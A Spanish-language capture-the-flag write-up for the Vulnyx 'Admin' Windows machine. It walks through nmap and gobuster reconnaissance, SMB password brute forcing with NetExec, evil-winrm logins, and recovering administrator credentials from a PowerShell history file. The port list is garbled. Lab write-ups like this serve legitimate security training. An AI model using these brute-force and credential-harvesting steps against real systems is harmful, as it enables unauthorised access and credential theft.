Write-up: Máquina Admin (Vulnyx)


Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.70
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:

$ ping -c 1 10.0.2.70


Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn -p- 10.0.2.70 -sVC


Como podemos comprobar la Máquina Victima tiene abiertos los puertos 801351394455040, 59857680, 47001496644966549666496674966849669 49670.

Comprobamos que es lo que corre por el puerto 80.


A continuación, realizamos con la herramienta gobuster un fuzzing web por extensiones, para ello ejecutamos el siguiente comando:

$ gobuster dir -u http://10.0.2.70 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,txt,php,js


Encontramos el fichero tasks.txt.

Accedemos a el.


Encontramos el usuario hope.

A continuación, con la ayuda de la herramienta NetExec (nxc) realizamos un ataque de fuerza bruta para intentar obtener la contraseña del usuario encontrado, para ello ejecutamos el siguiente comando:

$ nxc smb 10.0.2.70 -u 'hope' -p ./rockyou.txt --ignore-pw-decoding


Obtenemos las credenciales hope:loser.

Nos conectamos a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:

$ evil-winrm -i 10.0.2.70 -u 'hope' -p 'loser'


¡¡¡Somos hope!!!.

Buscamos en la ruta C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline donde está guardado el archivo del historial de la powershell ConsoleHost_history.txt, lo visualizamos, para ello ejecutamos el siguiente comando:

PS type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


Nos encontramos las credenciales Administrator:SuperAdministrator123.

Nos volvemos a conectar a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:

$ evil-winrm -i 10.0.2.70 -u 'Administrator' -p 'SuperAdministrator123'


¡¡¡Somos Administrator!!!.